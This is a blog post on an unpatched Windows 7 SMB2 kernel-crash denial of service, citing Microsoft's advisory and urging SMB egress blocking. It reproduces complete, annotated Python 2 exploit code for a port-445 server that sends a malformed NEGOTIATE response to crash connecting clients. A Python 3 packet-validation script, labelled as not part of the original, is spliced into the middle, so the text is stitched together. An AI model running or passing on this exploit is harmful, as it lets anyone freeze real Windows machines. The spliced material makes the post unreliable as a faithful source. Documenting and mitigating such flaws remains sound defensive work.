Windows 7 SMB Kernel Crash Video


Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system freezes outright, creating a denial of service when, for example, a user is tricked into clicking a link on a web page that points to a malicious SMB share request. According to Microsoft, the SMB client goes into an infinite loop while processing this malformed request. The video below demonstrates the effect: a user clicks a web site link and the machine crashes.

“We are not aware of any active attacks using the exploit code that was made public for this vulnerability”
Jerry Bryant, Microsoft

Microsoft discusses this problem under Security Advisory 977544. The Security Response Center (MSRC) blog announced last Thursday that it would not correct this bug in this month’s patch release. The MSFT advisory initially discusses ingress rules for firewalls (rules for requests coming from the Internet) under mitigating factors, which would not help when the user makes the outbound request by clicking a link. It then catches this under ‘Workarounds’, stating to “block all SMB communications to and from the Internet to help prevent attacks”, which is the correct approach.

Windows 7 SMB Crash Video

People seem to be having a hard time visualizing this attack. The video below demonstrates first the crash itself, and then simulates a user clicking a link to a malformed SMB request.

Test Code

Here is the Python 2 code used for testing, based on Gaffié’s original post:

import SocketServer as a
# The adjacent string literals must sit inside parentheses so Python joins them
# into a single packet; as separate lines they would be discarded statements.
packet = ("\x00\x00\x00\x9a"  # NetBIOS session header: length of what follows
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"  # SMB2 header begins
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"  # NEGOTIATE response body
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class x(a.BaseRequestHandler):
    def handle(s):
        print "You connecting to me: %s" % (s.client_address[0])
        i = s.request.recv(1024)   # read the client's NEGOTIATE request
        s.request.send(packet)     # answer with the malformed response
        s.request.close()
print "Waiting for the victim to connect to my open port 445"
launch = a.TCPServer(('', 445), x)  # binding port 445 requires privileges
launch.serve_forever()

SMB

Server Message Block or SMB is an application-layer network protocol commonly used by Microsoft Windows to share files over the Local Area Network (LAN).
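As an added illustration (not part of the original post or of Gaffié’s code), the Python 3 script below dissects a NetBIOS-framed SMB2 NEGOTIATE response, the kind of reply the test server above sends, and reports the consistency checks a cautious client or an IDS would want to make: NetBIOS length versus bytes actually carried, header magic and command, and whether the security buffer lies inside the frame. The sample response it builds is constructed here, not a captured packet, and the SPNEGO blob is a placeholder.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
HDR_FMT = "<4sHHIHHI"          # ProtocolId..Flags: first 20 of the 64 header bytes
NEG_FMT = "<HHHH16sIIIIQQHHI"  # fixed 64-byte NEGOTIATE response body

def inspect_negotiate_response(frame):
    """Parse a NetBIOS-framed SMB2 NEGOTIATE response; return (fields, findings)."""
    findings = []
    if len(frame) < 4 + 64 + 64:
        return {}, ["frame too short for NetBIOS + SMB2 header + NEGOTIATE body"]
    nb_len = struct.unpack(">I", frame[:4])[0]   # NetBIOS session length is big-endian
    if nb_len != len(frame) - 4:
        findings.append("NetBIOS length %d != %d payload bytes" % (nb_len, len(frame) - 4))
    magic, hdr_size, _cc, status, command, _cr, flags = struct.unpack(HDR_FMT, frame[4:24])
    if magic != SMB2_MAGIC or hdr_size != 64:
        findings.append("not a well-formed SMB2 header")
    if command != 0 or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        findings.append("command/flags do not describe a NEGOTIATE response")
    (body_size, sec_mode, dialect, _r1, guid, caps, max_tx, max_rd, max_wr,
     _sys, _start, sec_off, sec_len, _r2) = struct.unpack(NEG_FMT, frame[68:132])
    if body_size != 65:
        findings.append("NEGOTIATE StructureSize %d != 65" % body_size)
    # SecurityBufferOffset is relative to the SMB2 header, which starts at frame offset 4
    if sec_off < 64 + 64 or 4 + sec_off + sec_len > len(frame):
        findings.append("security buffer [%d, +%d) lies outside the frame" % (sec_off, sec_len))
    fields = dict(nb_len=nb_len, status=status, dialect=dialect, security_mode=sec_mode,
                  capabilities=caps, max_transact=max_tx, max_read=max_rd, max_write=max_wr,
                  server_guid=guid.hex(), security_blob=frame[4 + sec_off:4 + sec_off + sec_len])
    return fields, findings

def build_sample_response(nb_len=None, sec_len=None):
    """Constructed sample (not a captured packet): minimal NEGOTIATE response offering
    dialect 0x0202; nb_len / sec_len let the caller plant an inconsistent length."""
    blob = b"\x60\x06\x06\x04\x2b\x06\x01\x05"   # placeholder bytes, not a real token
    hdr = struct.pack(HDR_FMT, SMB2_MAGIC, 64, 0, 0, 0, 1, SMB2_FLAGS_SERVER_TO_REDIR) + b"\x00" * 44
    body = struct.pack(NEG_FMT, 65, 1, 0x0202, 0, b"\x11" * 16, 1, 65536, 65536, 65536,
                       0, 0, 128, len(blob) if sec_len is None else sec_len, 0) + blob
    payload = hdr + body
    return struct.pack(">I", len(payload) if nb_len is None else nb_len) + payload

if __name__ == "__main__":
    for label, frame in (("consistent", build_sample_response()),
                         ("NetBIOS length too short", build_sample_response(nb_len=0x9a)),
                         ("blob overruns frame", build_sample_response(sec_len=200))):
        fields, findings = inspect_negotiate_response(frame)
        print(label, "-> dialect 0x%04x, findings: %s" % (fields["dialect"], findings or "none"))
```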

Finally

Many ISPs block traffic on the SMB port for home broadband Internet connections, in reaction to past remote threats that used it. For businesses, unless good egress rules are in place (often they are not), this attack is a realistic threat. Good egress rules will block it, and should already be in place for other potential threats; this provides a good excuse to check.

Microsoft has yet to announce a scheduled fix date for this. While not as problematic as, say, an exploit that allows code injection, a remotely exploitable DoS that has been publicly known and unpatched (zero-day) for more than two months likely does merit attention in February’s Patch Tuesday release.

Filed Under: Remote Exploit


Comments (7)


  1. Stuart says:

    So where do I get the free cheese balls from?

  2. Social comments and analytics for this post…

    This post was mentioned on Twitter by ThePraetorian: Windows SMB Crash Video – http://bit.ly/7r4bnF

  3. [...] Security. I don’t know anything about the company but I do enjoy the video they provided of the Windows 7 SMB Kernel Crash Video. The best part is that Microsoft still does not believe it needs a patch. This is the same [...]

  5. Bilal Malik says:

    I tried to run this code in Python 3.2 but I got several errors. Was anyone able to run this code?

  6. Bilal Malik says:

    The error I get is: An attempt was made to access a socket in a way forbidden by its access permissions.